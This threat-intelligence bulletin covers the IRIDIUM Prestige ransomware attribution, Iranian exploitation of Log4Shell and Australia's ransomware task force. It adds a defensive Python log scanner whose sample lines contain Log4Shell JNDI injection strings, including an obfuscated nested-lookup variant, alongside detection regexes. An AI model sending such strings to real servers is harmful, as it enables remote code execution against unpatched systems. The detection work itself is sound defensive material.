Threat Actor Update: IRIDIUM Attributed to Prestige Ransomware Campaign
A ransomware campaign targeting transportation and logistics organizations in Ukraine and Poland has been attributed to a group called IRIDIUM. The campaign used a previously unidentified ransomware payload called ‘Prestige’, which was observed being deployed on October 11th, 2022. The objective of the campaign was to cause disruption, not financial gain. IRIDIUM is a Russia-based actor that overlaps with Sandworm and has been consistently active in Ukraine, with IRIDIUM being linked to activity in March 2022 (1).
The Ukraine war continues to highlight the increased use of ransomware for non-financial ends. Ransomware has been used for non-financial ends before (2); however, most ransomware incidents have historically been financially driven. For example, the HermeticRansom malware used in Ukraine is suspected to be a smokescreen for destructive attacks (3). Hacktivist group FRwL has used ransomware during the Ukraine war without demanding a ransom (4, 14). BRONZE STARLIGHT, another cyber threat actor group, is suspected of using ransomware to distract responders from its true motivation, cyber espionage (5).
Exploit Tools and Targets: Log4j Continues to be Actively Exploited
Iranian government-sponsored APTs have been observed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) exploiting Log4Shell (CVE-2021-44228) for persistence within the U.S. Federal Civilian Executive Branch (FCEB). The actors exploited an unpatched VMware Horizon server using Log4Shell to install the XMRig crypto miner within the FCEB environment. They moved laterally within the environment to the domain controller, compromised credentials, and installed Ngrok reverse proxies on multiple hosts to maintain persistence within the victims’ environments (6).
Log4Shell will almost certainly be exploited in the short and medium term by actors across the threat landscape. Log4Shell is a remote code execution (RCE) vulnerability in the popular Java logging library Log4j, which is used in multiple software products. Other Iran-linked threat groups have exploited Log4j in SysAid Server instances (7) and VMware Horizon (8). Ransomware groups have also exploited Log4j; the Avos ransomware group used the Log4Shell vulnerability for initial access to the victim’s environment (9).
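Since Log4Shell is triggered by attacker-controlled text reaching a Log4j logger, a first-line detection is to scan web-server or application logs for JNDI lookup strings, including the nested lookups that Log4j resolves before the JNDI lookup runs. The following is an added example (not code from the report or from EclecticIQ); the log lines are constructed samples using documentation IP ranges, and the regular expressions are the author's own, not a vendor signature.

```python
import re

# Constructed sample web-server log lines (not from the report): benign traffic
# mixed with the kind of JNDI lookup strings seen in Log4Shell probes.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Oct/2022:10:00:01] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [11/Oct/2022:10:00:02] "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [11/Oct/2022:10:00:03] "GET /x HTTP/1.1" 404 "${${lower:j}ndi:${lower:r}mi://203.0.113.7/b}"',
    '10.0.0.3 - - [11/Oct/2022:10:00:04] "GET /search?q=${date:yyyy} HTTP/1.1" 200 "curl/7.68.0"',
]

# Log4j evaluates inner lookups such as ${lower:J} or ${::-j} (empty lookup with a
# ":-" default) before the outer ${jndi:...} lookup, so a detector must collapse
# those wrappers first or it will miss anything but the plainest probe.
_NESTED = re.compile(r"\$\{(?:lower|upper|env|sys|date)?:([^${}]*?)(?::-([^${}]*))?\}", re.I)
# JNDI lookup with one of the URI schemes the Log4j JNDI manager will follow.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|rmi|dns|iiop|corba|nds|http)s?://", re.I)


def normalize_lookups(text: str) -> str:
    """Collapse nested Log4j lookups, innermost first, until nothing changes."""
    def _repl(m: re.Match) -> str:
        # A ":-default" wins; otherwise keep the lookup argument itself.
        return m.group(2) if m.group(2) is not None else m.group(1)

    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(_repl, text)
    return text


def detect_log4shell(lines):
    """Return (1-based line number, JNDI scheme) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize_lookups(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for n, scheme in detect_log4shell(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {scheme} -> {SAMPLE_LOGS[n - 1]}")
```

A hit is a reason to check whether the receiving application logged that field with a vulnerable Log4j 2 version; it is not on its own proof of compromise, so pair it with the post-exploitation indicators the report lists (unexpected XMRig processes, Ngrok binaries and outbound tunnels).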
Policy Keynotes: Australia Announces a Task Force to Disrupt and Stop Cybercrime
Australia on October 12th announced the formation of the Joint Standing Operation, a task force aimed at disrupting and stopping cybercriminal syndicates, with priority given to groups using ransomware. The operation will collect intelligence and identify networks, infrastructure, and individual leaders, regardless of their location. The joint standing operation will involve the Australian Federal Police and the Australian Signals Directorate, which will be given powers to hunt down and disrupt criminals (10).
The Australian government’s announcement shows a continued trend at a national and international level to address cybercriminal threats, specifically actors using ransomware. The United States government launched the Ransomware Task Force (RTF) in April 2021 to address the growing threat ransomware poses to U.S. private and public organizations (11). The European Union has adopted legislation requiring businesses, administrations, and organizations involved with infrastructure to meet stricter supervisory obligations and enforcement measures (12). The International Counter Ransomware Task Force (ICRTF), involving 36 countries and the EU, has been established to coordinate resilience, disruption, and information and capability sharing against ransomware threats (13).
About EclecticIQ Intelligence and Research
EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence and Research team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.
Find the Analyst Prompt and earlier editions in our public TAXII collection for easy use in your security stack.
TAXII v1 Discovery services: https://cti.eclecticiq.com/taxii/discovery
Please refer to our support page for guidance on how to access the feeds.